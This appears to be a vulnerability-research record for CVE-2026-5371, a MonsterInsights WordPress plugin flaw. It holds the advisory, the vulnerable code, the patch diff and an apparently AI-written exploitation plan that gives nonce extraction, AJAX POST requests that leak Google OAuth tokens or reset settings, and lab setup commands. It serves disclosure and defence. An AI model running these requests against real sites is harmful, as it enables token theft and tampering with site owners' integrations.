[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fUEOLiGhy9x1bEjRogHaLdodm9ZFSyoFJQTLJrh9RAtA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":40},"CVE-2026-5371","monsterinsights-missing-authorization-to-authenticated-subscriber-sensitive-information-exposure-and-plugin-integration-","MonsterInsights \u003C= 10.1.2 - Missing Authorization to Authenticated (Subscriber+) Sensitive Information Exposure And Plugin Integration Reset","The MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy) plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability checks on the get_ads_access_token() and reset_experience() functions in all versions up to, and including, 10.1.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve live Google OAuth access tokens and reset Plugins's Google Ads integration.","google-analytics-for-wordpress",null,"\u003C=10.1.2","10.1.3","high",7.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:L\u002FA:N","Missing Authorization","2026-05-12 09:45:13","2026-05-12 22:24:24",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5d380b66-675e-451d-a7e3-4efe1fbd08b2?source=api-prod",1,[22,23,24,25,26,27,28],"googleanalytics.php","includes\u002Fadmin\u002Fadmin-assets.php","includes\u002Fadmin\u002Fclass-monsterinsights-onboarding.php","includes\u002Fconnect.php","includes\u002Ffrontend\u002Ffrontend.php","includes\u002Fppc\u002Fgoogle\u002Fclass-monsterinsights-google-ads.php","languages\u002Fgoogle-analytics-for-wordpress.pot","researched",false,3,"# Vulnerability Analysis: MonsterInsights Missing Authorization (CVE-2026-5371)\n\n## 1. Vulnerability Summary\nThe MonsterInsights plugin (versions \u003C= 10.1.2) contains a missing authorization vulnerability in its Google Ads integration handlers. The functions `get_ads_access_token()` and `reset_experience()` within the `MonsterInsights_Google_Ads` class are registered as AJAX actions (`wp_ajax_monsterinsights_ads_get_token` and `wp_ajax_monsterinsights_ads_reset_experience`). While these functions verify a WordPress nonce, they fail to perform any capability checks (e.g., `current_user_can()`). Consequently, any authenticated user, including those with **Subscriber** privileges, can retrieve sensitive Google OAuth access tokens or reset the plugin's Google Ads configuration.\n\n## 2. Attack Vector Analysis\n*   **Endpoints:** \n    *   `admin-ajax.php?action=monsterinsights_ads_get_token`\n    *   `admin-ajax.php?action=monsterinsights_ads_reset_experience`\n*   **Authentication:** Authenticated (Subscriber+) required.\n*   **Authorization:** None (Missing `current_user_can`).\n*   **CSRF Protection:** Nonce required (Action: `mi-admin-nonce`, Parameter: `nonce`).\n*   **Preconditions:** The site must be connected to Google Analytics via MonsterInsights for a token to exist. For the reset exploit, the Google Ads integration settings must be populated.\n\n## 3. Code Flow\n1.  **Action Registration:** In `includes\u002Fppc\u002Fgoogle\u002Fclass-monsterinsights-google-ads.php`, the `__construct` method registers the AJAX hooks:\n    ```php\n    add_action('wp_ajax_monsterinsights_ads_get_token', array($this, 'get_ads_access_token'));\n    add_action('wp_ajax_monsterinsights_ads_reset_experience', array($this, 'reset_experience'));\n    ```\n2.  **Nonce Verification:** Both handlers call `check_ajax_referer('mi-admin-nonce', 'nonce')`.\n3.  **Vulnerable Sink (Token Exposure):** `get_ads_access_token()` calls `$this->get_access_token()`, which retrieves the token from a transient (`monsterinsights_google_ads_access_token_data`) or the API, then returns it via `wp_send_json_success`.\n4.  **Vulnerable Sink (Setting Reset):** `reset_experience()` calls `self::clear_data()`, which executes `delete_transient(self::TOKEN_CACHE_KEY)` and `monsterinsights_delete_option(self::SETTINGS_KEY)`, effectively wiping the integration.\n\n## 4. Nonce Acquisition Strategy\nThe `mi-admin-nonce` is localized for the `monsterinsights-admin-setup-wizard` script, which is enqueued on various admin pages, including the WordPress Dashboard (`index.php`), accessible to Subscribers.\n\n1.  **Target User:** Any authenticated user (Subscriber).\n2.  **Target Page:** `\u002Fwp-admin\u002Findex.php`.\n3.  **Source File:** `includes\u002Fadmin\u002Fadmin-assets.php`\n    ```php\n    wp_localize_script(\n        'monsterinsights-admin-setup-wizard',\n        'monsterinsights',\n        array(\n            'ajax'  => admin_url( 'admin-ajax.php' ),\n            'nonce' => wp_create_nonce( 'mi-admin-nonce' ),\n        )\n    );\n    ```\n4.  **Extraction Command:**\n    Use `browser_navigate` to go to `\u002Fwp-admin\u002Findex.php`, then:\n    `browser_eval(\"window.monsterinsights?.nonce\")`\n\n## 5. Exploitation Strategy\n\n### Step 1: Token Exposure\n**Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=monsterinsights_ads_get_token&nonce=[EXTRACTED_NONCE]\n```\n**Expected Response:**\n```json\n{\n    \"success\": true,\n    \"data\": {\n        \"access_token\": \"ya29.a0AfH6S...\"\n    }\n}\n```\n\n### Step 2: Integration Reset\n**Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=monsterinsights_ads_reset_experience&nonce=[EXTRACTED_NONCE]\n```\n**Expected Response:**\n```json\n{\n    \"success\": true,\n    \"data\": {\n        \"message\": \"Google Ads experience reset successfully.\"\n    }\n}\n```\n\n## 6. Test Data Setup\n1.  Install and activate MonsterInsights Lite 10.1.2.\n2.  **Mock Authentication:** Since actual Google OAuth is difficult in a PoC, manually set the options\u002Ftransients that the vulnerable functions expect:\n    ```bash\n    # Set fake settings\n    wp option update monsterinsights_google_ads_settings '{\"conversion_tracking_id\": \"AW-123456789\"}' --format=json\n    # Set fake token in transient\n    wp transient set monsterinsights_google_ads_access_token_data '{\"token\":\"poc-fake-access-token\",\"expires_at\":\"2099-01-01 00:00:00\"}' 3600\n    # Ensure MI is \"authed\" (required for get_access_token)\n    wp option update monsterinsights_site_auth '{\"analytics\":{\"key\":\"fake_key\"}}' --format=json\n    ```\n3.  Create a Subscriber user:\n    ```bash\n    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123\n    ```\n\n## 7. Expected Results\n*   **Token Exposure:** The AJAX response should contain the value `\"poc-fake-access-token\"`.\n*   **Reset:** The AJAX response should return success, and the `monsterinsights_google_ads_settings` option should no longer exist in the database.\n\n## 8. Verification Steps\n1.  **Verify Reset via CLI:**\n    ```bash\n    wp option get monsterinsights_google_ads_settings\n    # Expected: Error: Could not find the option with key 'monsterinsights_google_ads_settings'.\n    ```\n2.  **Verify Transient Removal:**\n    ```bash\n    wp transient get monsterinsights_google_ads_access_token_data\n    # Expected: (empty\u002Ffalse)\n    ```\n\n## 9. Alternative Approaches\nIf `window.monsterinsights.nonce` is not present on `index.php`, navigate to any page containing a MonsterInsights notice or the onboarding wizard. \nCheck `admin-assets.php` for other scripts that might expose the nonce:\n*   `monsterinsights-admin-common-script` localizes `monsterinsights_admin_common.dismiss_notice_nonce` (different action: `monsterinsights-dismiss-notice`).\n*   The `mi-admin-nonce` is the specific one used by the vulnerable handlers in `class-monsterinsights-google-ads.php`. If it's missing from the main dashboard, use `wp post create` to create a page containing a MonsterInsights-specific shortcode if any are available in Lite to force script enqueuing.","The MonsterInsights plugin fails to validate user capabilities in its Google Ads integration handlers. This allows authenticated users with Subscriber-level access to leak sensitive Google OAuth access tokens or reset the plugin's Google Ads integration settings via unauthorized AJAX requests.","\u002F\u002F includes\u002Fppc\u002Fgoogle\u002Fclass-monsterinsights-google-ads.php:50\nadd_action('wp_ajax_monsterinsights_ads_get_token', array($this, 'get_ads_access_token'));\nadd_action('wp_ajax_monsterinsights_ads_reset_experience', array($this, 'reset_experience'));\n\n---\n\n\u002F\u002F includes\u002Fppc\u002Fgoogle\u002Fclass-monsterinsights-google-ads.php:166\npublic function reset_experience() {\n    check_ajax_referer('mi-admin-nonce', 'nonce');\n\n    self::clear_data();\n\n    wp_send_json_success(array(\n        'message' => __('Google Ads experience reset successfully.', 'google-analytics-for-wordpress'),\n    ));\n}\n\n---\n\n\u002F\u002F includes\u002Fppc\u002Fgoogle\u002Fclass-monsterinsights-google-ads.php:240\npublic function get_ads_access_token()\n{\n    check_ajax_referer('mi-admin-nonce', 'nonce');\n\n    $access_token_result = $this->get_access_token();\n\n    if (is_wp_error($access_token_result)) {\n        wp_send_json_error(array(\n            'message' => $access_token_result->get_error_message(),\n            'code'    => $access_token_result->get_error_code(),\n            'details' => $access_token_result->get_error_data(),\n        ));\n    }\n\n    wp_send_json_success(array(\n        'access_token' => $access_token_result,\n    ));\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-for-wordpress\u002F10.1.2\u002Fincludes\u002Fppc\u002Fgoogle\u002Fclass-monsterinsights-google-ads.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-for-wordpress\u002F10.1.3\u002Fincludes\u002Fppc\u002Fgoogle\u002Fclass-monsterinsights-google-ads.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-for-wordpress\u002F10.1.2\u002Fincludes\u002Fppc\u002Fgoogle\u002Fclass-monsterinsights-google-ads.php\t2026-02-05 14:33:48.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgoogle-analytics-for-wordpress\u002F10.1.3\u002Fincludes\u002Fppc\u002Fgoogle\u002Fclass-monsterinsights-google-ads.php\t2026-04-22 16:46:26.000000000 +0000\n@@ -167,6 +167,12 @@\n \tpublic function reset_experience() {\n \t\tcheck_ajax_referer('mi-admin-nonce', 'nonce');\n \n+\t\tif (! current_user_can('monsterinsights_save_settings')) {\n+\t\t\twp_send_json_error(array(\n+\t\t\t\t'message' => __('You do not have permission to reset the Google Ads experience.', 'google-analytics-for-wordpress'),\n+\t\t\t));\n+\t\t}\n+\n \t\tself::clear_data();\n \n \t\twp_send_json_success(array(\n@@ -244,6 +250,12 @@\n \t{\n \t\tcheck_ajax_referer('mi-admin-nonce', 'nonce');\n \n+\t\tif (! current_user_can('monsterinsights_save_settings')) {\n+\t\t\twp_send_json_error(array(\n+\t\t\t\t'message' => __('You do not have permission to retrieve the Google Ads access token.', 'google-analytics-for-wordpress'),\n+\t\t\t));\n+\t\t}\n+\n \t\t$access_token_result = $this->get_access_token();\n \n \t\tif (is_wp_error($access_token_result)) {","An attacker with Subscriber-level authentication can exploit this vulnerability through the following steps:\n1. Log in to the WordPress site as any authenticated user (e.g., Subscriber).\n2. Obtain the 'mi-admin-nonce' value, which is localized and enqueued for various admin scripts (like the setup wizard or admin bar) and often visible in the source of the WordPress dashboard (`\u002Fwp-admin\u002Findex.php`).\n3. Send an authenticated POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the parameter `action=monsterinsights_ads_get_token` and the captured `nonce` to retrieve the current Google OAuth access token.\n4. Alternatively, send a POST request with `action=monsterinsights_ads_reset_experience` and the `nonce` to wipe the plugin's Google Ads integration settings from the database.","gemini-3-flash-preview","2026-05-14 18:11:48","2026-05-14 18:12:26",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","10.1.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgoogle-analytics-for-wordpress\u002Ftags\u002F10.1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgoogle-analytics-for-wordpress.10.1.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgoogle-analytics-for-wordpress\u002Ftags\u002F10.1.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgoogle-analytics-for-wordpress.10.1.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgoogle-analytics-for-wordpress\u002Ftags"]